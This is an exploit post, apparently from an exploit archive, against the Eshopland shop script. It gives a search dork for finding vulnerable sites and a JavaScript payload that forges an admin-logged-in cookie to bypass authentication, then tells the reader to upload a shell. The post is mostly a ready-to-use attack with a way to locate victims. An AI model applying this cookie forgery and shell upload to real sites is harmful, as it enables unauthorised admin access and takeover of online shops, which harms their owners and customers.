id: 16130
date: 05/18/2011
title: Eshopland Shop Script Upload Shell Vulnerability
author: Al-Ghamdi
cves: 

____________________________________________________________________
____________________________________________________________________


-=-=-=-{In The Name Of Allah The Mercifull}-=-=-=-=-

[~] Exploit Title: [ Powered by Eshopland.ir  Shop Script Vulnerability ]
                                                        
[~] email    : by-root@hotmail.com
[~] Home     : in my home
[~] Web Site : http://www.p30vel.ir/
[~] Dork : "ir/index.php?a=new"
======================      Exploit      =================================
 
 - http://127.0.0.1/index.php?a=new
 - http://127.0.0.1/admin.php
 - Put in place link >>  javascript:document.cookie="shop2008admin340289410088795logged=OK;path=/";
 Then press Enter and then return and then update
 And will enter the site ..

 # Then Upload your Shell.




(+)Gr33ts to : Only my God [ Allah ] ..
____________________________________________________________________
____________________________________________________________________



#  0day.today [2023-03-27]  #